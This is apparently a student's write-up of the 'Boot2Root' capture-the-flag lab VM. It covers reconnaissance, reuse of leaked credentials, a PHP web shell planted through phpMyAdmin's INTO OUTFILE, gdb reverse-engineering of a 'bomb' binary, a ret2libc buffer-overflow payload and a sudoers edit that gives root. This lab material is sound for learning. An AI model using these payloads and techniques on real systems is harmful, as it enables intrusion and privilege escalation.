<!doctype html><html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <title>Mandatory</title>
  <meta name="generator" content="CherryTree">
  <link rel="stylesheet" href="styles.css" type="text/css" />
</head>
<body><div class="main"><div class="tree">
<p><strong>Index</strong></p>
<p><a href="School--Boot2Root.html">Boot2Root</a></p>

<ol>
<li><a href="School--Boot2Root--Bonus.html">Bonus</a></li>
<ol>
<li><a href="School--Boot2Root--Bonus--RECON.html">RECON</a></li>
<li><a href="School--Boot2Root--Bonus--SCANNING_AND_ENUMERATION.html">SCANNING AND ENUMERATION</a></li>
<li><a href="School--Boot2Root--Bonus--VULN_ANALYSIS.html">VULN ANALYSIS</a></li>
<li><a href="School--Boot2Root--Bonus--EXPLOITATION.html">EXPLOITATION</a></li>
<li><a href="School--Boot2Root--Bonus--PRIVESC.html">PRIVESC</a></li>
</ol>
<li><a href="School--Boot2Root--Mandatory.html">Mandatory</a></li>
</ol></div>
<div class="page"><h1><b><u>Mandatory</u></b></h1>start vm<br /><br />Nmap find ip of VBOX host<br />nmap find port of VBOX host<br /><br />port 80, 443, 21, 22, 143, 993<br /><br /> ----dirbuster on : https://192.168.0.42/ ----<br />==&gt; DIRECTORY: https://192.168.0.42/forum/js/<br />==&gt; DIRECTORY: https://192.168.0.42/forum/lang/<br />==&gt; DIRECTORY: https://192.168.0.42/forum/modules/<br />==&gt; DIRECTORY: https://192.168.0.42/forum/templates_c/<br />==&gt; DIRECTORY: https://192.168.0.42/forum/themes/<br />==&gt; DIRECTORY: https://192.168.0.42/forum/update/<br />==&gt; DIRECTORY: https://192.168.0.42/webmail/<br />==&gt; DIRECTORY: <a href="https://192.168.0.42/phpmyadmin/">https://192.168.0.42/phpmyadmin/</a><br /><br />into the forum we have lmezard post where we can see his password !q\]Ej?*5K5cy*AJ<br />we connect to the forum with log lmezard:!q\]Ej?*5K5cy*AJ<br />the we check his webmail, and we connect with lmezard email<br />    laurie@borntosec.net:!q\]Ej?*5K5cy*AJ<br />    <br />we see a mail DB Access in the mail we find phpmyadmin root logn : root/Fg-'kKXBj87E:aJ$<br /><br />so we have acces to the database and can run query , lets try to create a file<br />SELECT "blabla123" INTO OUTFILE "/var/www/forum/js/testfile123" --- NOPE<br />SELECT "blabla123" INTO OUTFILE "/var/www/forum/lang/testfile123" --- NOPE<br />SELECT "blabla123" INTO OUTFILE "/var/www/forum/modules/testfile123" --- NOPE<br />SELECT "blabla123" INTO OUTFILE "/var/www/forum/theme/testfile123" --- NOPE<br />SELECT "blabla123" INTO OUTFILE "/var/www/forum/template_c/testfile123" --- YES!!!<br />so now i upload a exec php with system()<br />SELECT "&lt;?php system($_GET['cmd']); ?&gt;" INTO OUTFILE "/var/www/forum/templates_c/exc.php"<br /><br />now i visit https://192.168.0.42/form/exc?cmd=ls -R /home<br />and we have  /home/LOOKATME: password <br />now i visit https://192.168.0.42/form/exc?cmd=cat /home/LOOKATME/password<br /><br />lmezard:G!@M6f4Eatau{sF"<br />this doesnt work with SSH but it does with FTP<br />so ftp 192.1688.0.42<br />lmezard<br />G!@M6f4Eatau{sF"<br />and we are connected<br /><br />ftp&gt;ls<br />-rwxr-x---    1 1001     1001           96 Oct 15  2015 README<br />-rwxr-x---    1 1001     1001       808960 Oct 08  2015 fun<br />ftp&gt;get README<br />$cat README<br />Complete this little challenge and use the result as password for user 'laurie' to login in ssh<br />ftp&gt;get fun<br />$cat fun<br />//file634ft_fun/H87VI.pcap0000640000175000001440000000005412563172202012513 0ustar  nnmusers    printf("Hahahaha Got you!!!\n");<br />//file618ft_fun/A5812.pcap0000640000175000001440000000003412563172202012404 0ustar  nnmusers}void useless() {<br />//file155ft_fun/9U5NH.pcap0000640000175000001440000000005412563172202012516 0ustar  nnmusers    printf("Hahahaha Got you!!!\n");<br />//file344ft_fun/CDU6L.pcap0000640000175000001440000000003412563172202012521 0ustar  nnmusers}void useless() {<br />//file665ft_fun/O2AY2.pcap0000640000175000001440000000005312563172202012501 0ustar  nnmusers    printf("Hahahaha Got you!!!\n");<br />//file10ft_fun/YVO5O.pcap0000640000175000001440000000005412563172202012567 0ustar  nnmusers printf("Hahahaha Got you!!!\n");<br />//file546ft_fun/VICU6.pcap0000640000175000001440000000003412563172202012540 0ustar  nnmusers}void useless() {<br />//file617ft_fun/T44J5.pcap0000640000175000001440000000002712563172202012460 0ustar  nnmusers    return 'p';<br />...<br />we have a archive ! (0ustar)<br />$tar -xvf fun<br />$cd ft_fun<br /><br />we have thons of .pcap files<br />when we cat all files , we see that most of them contains the function "useless"<br />but some have the function getme()<br /><br />$grep getme *<br />we can see getme1, getme2, getme3....<br />when we cat the files they are not the full function but instead the file number with the rest of the function<br />"//fileXXX"<br /><br />so with this we can rebuild the program and get the password : Iheartpwnage<br />we also seen this line :    printf("Now SHA-256 it and submit");<br />ssh -&gt; laurie:330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4<br />when we do ls there is a binary called Bomb<br /><br />phase_1 : Public speaking is very easy.<br />these asm Insctruction, we have passwordssphrase in 0x80497c0<br />   0x08048b2c &lt;+12&gt;:  push   $0x80497c0<br />   0x08048b31 &lt;+17&gt;:  push   %eax<br />   0x08048b32 &lt;+18&gt;:  call   0x8049030 &lt;strings_not_equal&gt;<br />(gdb) x/s 0x80497c0<br />0x80497c0:   "Public speaking is very easy."<br />Answer : Public speaking is very easy.<br /><br /><br />phase_2 :<br />we see func red_six_number so we have to input 6 number<br />   0x08048b7e &lt;+54&gt;:  cmp    %eax,(%esi,%ebx,4)<br />   0x08048b81 &lt;+57&gt;:  je     0x8048b88 &lt;phase_2+64&gt;<br />   <br />by looking at the comparison one by one we can see the numbers are : 1 2 6 24 120 720<br />answer : 1 2 6 24 120 720<br /><br />phase_3 : <br />we have our input stocked in  : -0x4(%ebp)<br />                                -0x5(%ebp)<br />                                -0xc(%ebp)<br />sscanf format string %d %c %d<br />input : 1 k 3<br />(gdb) x/c $ebp-0x5<br />0xbffff713:     107 'k'<br />(gdb) x/d $ebp-0x4<br />0xbffff714:     3<br />(gdb) xd $ebp-0xc<br />0xbffff70c:     1<br />this comp : =&gt;   0x08048bc9 &lt;+49&gt;:    cmpl   $0x7,-0xc(%ebp)<br />                0x08048bcd &lt;+53&gt;:    ja     0x8048c88 &lt;phase_3+240&gt;<br />                <br />mean first number has to be &lt; 7<br />this jump will jump according to first argument -0xc(%ebp)<br />   0x08048bd3 &lt;+59&gt;:    mov    -0xc(%ebp),%eax<br />   0x08048bd6 &lt;+62&gt;:    jmp    *0x80497e8(,%eax,4)<br />   <br />with jump 1 we have to match last number = 0xd6 (214)<br />=&gt; 0x08048c02 &lt;+106&gt;:   cmpl   $0xd6,-0x4(%ebp)<br />   0x08048c09 &lt;+113&gt;:   je     0x8048c8f &lt;phase_3+247&gt;<br />   <br />with jump 2 we have to match last number = 0x2f3 (755)<br />and $bl will be = 98 (character 'b')<br />    0x08048c16 &lt;+126&gt;:   mov    $0x62,%bl<br />    0x08048c18 &lt;+128&gt;:   cmpl   $0x2f3,-0x4(%ebp)<br />    <br />with jump 2 the answer is : 2 b 755<br />with the jump 1 the answer is : 1 b 214<br /><br /><br />phase_4 : we know we have 1 argument    <br />    0x08048cfe &lt;+30&gt;:    cmp    $0x1,%eax<br />    <br />we have to input a number by looking at the code we see func4 is recursive function it will iterate depending on our input<br /><br />i tryed high number like 999 255 and it loop infinitly<br />so i did with 1, 2, 3, 4, 5, 6, 7, 8, 9<br />and it worked at 9<br /><br />solution : 9<br /><br />phase_5 : by looking at the code we need to match the string "giants"<br />but when we type giants it is transformed to "hbsfev"<br />(gdb) x/s 0x804980b<br />0x804980b:       "giants"<br />x/s $esi<br />0x804b220 &lt;array.123&gt;:   "isrveawhobpnutfg\260\001"<br />when we input "isrvea" we get -&gt; "bvrwas"<br />              "whobpn" we get -&gt; "hogrif"<br />              "utfgis" we get -&gt; "aewhbv"<br />              "cdgjkl" we get -&gt; "vehpnu"<br />              "mqtxyz" we get -&gt; "tseobp"<br />so e-&gt;a<br />   a-&gt;s<br />   o-&gt;g<br />   p-&gt;i<br />   k-&gt;n<br />   m-&gt;t<br />   <br />the answer is  "opekma"<br /><br />phase_6 :<br />we have    0x08048db3 &lt;+27&gt;:  call   0x8048fd8 &lt;read_six_numbers&gt;<br />on round 6 we need 6 int argument<br />the code check if the numbers are between 1 and 6<br />then it check that the numbers typed don't repeat then it will check the order<br />so we test all possibility until it work<br />we cant test numbers one by one with this comp <br /><br />=&gt; 0x08048e75 &lt;+221&gt;:  cmp    (%edx),%eax<br />   0x08048e77 &lt;+223&gt;: jge    0x8048e7e &lt;phase_6+230&gt;<br />   <br />with input : 1 2 3 4 5 6 the bomb explode at the first Comp<br />             2 4 3 5 6 1 same<br />             3 2 1 4 5 6 same<br />             4 3 2 1 5 6 here we pass the first test ! we know the first number is 4<br />             doing that for every numbers we have the solution : 4 2 6 3 1 5<br />             <br />afte some research i managed to get the final thor assword :<br />Publicspeakingisveryeasy.126241207201b2149opekmq426135<br />after connecting to thor<br /><br />we see a file called turtle with directions indication, the is for the well known Turtle lign drawer<br /><br />so we use this python script : <br /><div class="codebox"><div class="codebox"><span style="color:#333333;font-weight:400">from</span>&nbsp;turtle&nbsp;<span style="color:#333333;font-weight:400">import</span>&nbsp;*<br />color(<span style="color:#3ad900;font-weight:400">'red'</span>,&nbsp;<span style="color:#3ad900;font-weight:400">'yellow'</span>)<br />begin_fill()<br />i&nbsp;=&nbsp;<span style="color:#ff0044;font-weight:400">0</span><br />speed(<span style="color:#ff0044;font-weight:400">10</span>)<br /><span style="color:#ff9d00;font-weight:700">while</span>&nbsp;<span style="color:#ff0044;font-weight:400">True</span>:<br />&nbsp;&nbsp;&nbsp;&nbsp;left(<span style="color:#ff0044;font-weight:400">90</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">51</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;<span style="color:#ff9d00;font-weight:700">while</span>&nbsp;(i&nbsp;&lt;&nbsp;<span style="color:#ff0044;font-weight:400">180</span>):<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;left(<span style="color:#ff0044;font-weight:400">1</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">1</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;=&nbsp;i&nbsp;+&nbsp;<span style="color:#ff0044;font-weight:400">1</span><br />&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;=&nbsp;<span style="color:#ff0044;font-weight:400">0</span><br />&nbsp;&nbsp;&nbsp;&nbsp;<span style="color:#ff9d00;font-weight:700">while</span>&nbsp;(i&nbsp;&lt;&nbsp;<span style="color:#ff0044;font-weight:400">180</span>):<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;right(<span style="color:#ff0044;font-weight:400">1</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">1</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;=&nbsp;i&nbsp;+&nbsp;<span style="color:#ff0044;font-weight:400">1</span><br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">260</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;backward(<span style="color:#ff0044;font-weight:400">210</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;right(<span style="color:#ff0044;font-weight:400">90</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">120</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;right(<span style="color:#ff0044;font-weight:400">10</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">200</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;right(<span style="color:#ff0044;font-weight:400">150</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">200</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;backward(<span style="color:#ff0044;font-weight:400">100</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;right(<span style="color:#ff0044;font-weight:400">120</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">50</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;left(<span style="color:#ff0044;font-weight:400">90</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">51</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;=&nbsp;<span style="color:#ff0044;font-weight:400">0</span><br />&nbsp;&nbsp;&nbsp;&nbsp;<span style="color:#ff9d00;font-weight:700">while</span>&nbsp;(i&nbsp;&lt;&nbsp;<span style="color:#ff0044;font-weight:400">180</span>):<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;left(<span style="color:#ff0044;font-weight:400">1</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">1</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;=&nbsp;i&nbsp;+&nbsp;<span style="color:#ff0044;font-weight:400">1</span><br />&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;=&nbsp;<span style="color:#ff0044;font-weight:400">0</span><br />&nbsp;&nbsp;&nbsp;&nbsp;<span style="color:#ff9d00;font-weight:700">while</span>&nbsp;(i&nbsp;&lt;&nbsp;<span style="color:#ff0044;font-weight:400">180</span>):<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;right(<span style="color:#ff0044;font-weight:400">1</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">1</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;=&nbsp;i&nbsp;+&nbsp;<span style="color:#ff0044;font-weight:400">1</span><br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">150</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;backward(<span style="color:#ff0044;font-weight:400">200</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">100</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;right(<span style="color:#ff0044;font-weight:400">90</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">100</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;right(<span style="color:#ff0044;font-weight:400">90</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;forward(<span style="color:#ff0044;font-weight:400">100</span>)<br />&nbsp;&nbsp;&nbsp;&nbsp;backward(<span style="color:#ff0044;font-weight:400">200</span>)<br />end_fill()<br />done()</div></div><br /><br />and the turltle draw the word SLASH of course its not the password<br />the challenge say we have to "digest the password"<br />so we will hash the password with 'Message digest5' (MD5)<br />MD5 slash -&gt; 646da671ca01bb5d84dbb5fb2238dc8e<br />now that we have zaz password we connect to his session<br />and what we see there is a binary named exploit_me, with shared uid from root<br />we run it normally and it just print the argument <br /><br />$ strings ./exploit_me<br />...<br />strcpy<br />...<br /><br />we try to crash the program <br /><br />$ ./exploit_me $(python -c 'print("A"*500)')<br />segfault<br /><br />we find the offset is 140<br /><br />we need to find the address of the system <br /><br />(gdb) p system<br />$5 = {&lt;text variable, no debug info&gt;} 0xb7e6b060 &lt;system&gt;<br /><br />(gdb) p exit<br />$6 = {&lt;text variable, no debug info&gt;} 0xb7e5ebe0 &lt;exit&gt;<br /><br />(gdb) find 0xb7e2b000,+99999999,"/bin/sh"<br />0xb7f8cc58<br /><br />warning: Unable to access target memory at 0xb7fd3160, halting search.<br /><br />1 pattern found.<br />now we can run our exploit !<br />./exploit_me $(python -c 'print("\x90"*140+"\x60\xb0\xe6\xb7"+"\xe0\xeb\xe5\xb7"+"\x58\xcc\xf8\xb7")')<br />now we have a shell with Root right , but when i use id command i am still zaz<br /><br />so what i will do is :<br /><br />$vim /etc/sudoers<br />i add : zaz ALL=(ALL:ALL) ALL<br /><br />then i exit the shell and run <br /><br />zaz@BornToSecHackMe:~$ sudo su<br /><br />[sudo] password for zaz: <br /><br />i enter zaz password and im root</div></div>
</body></html>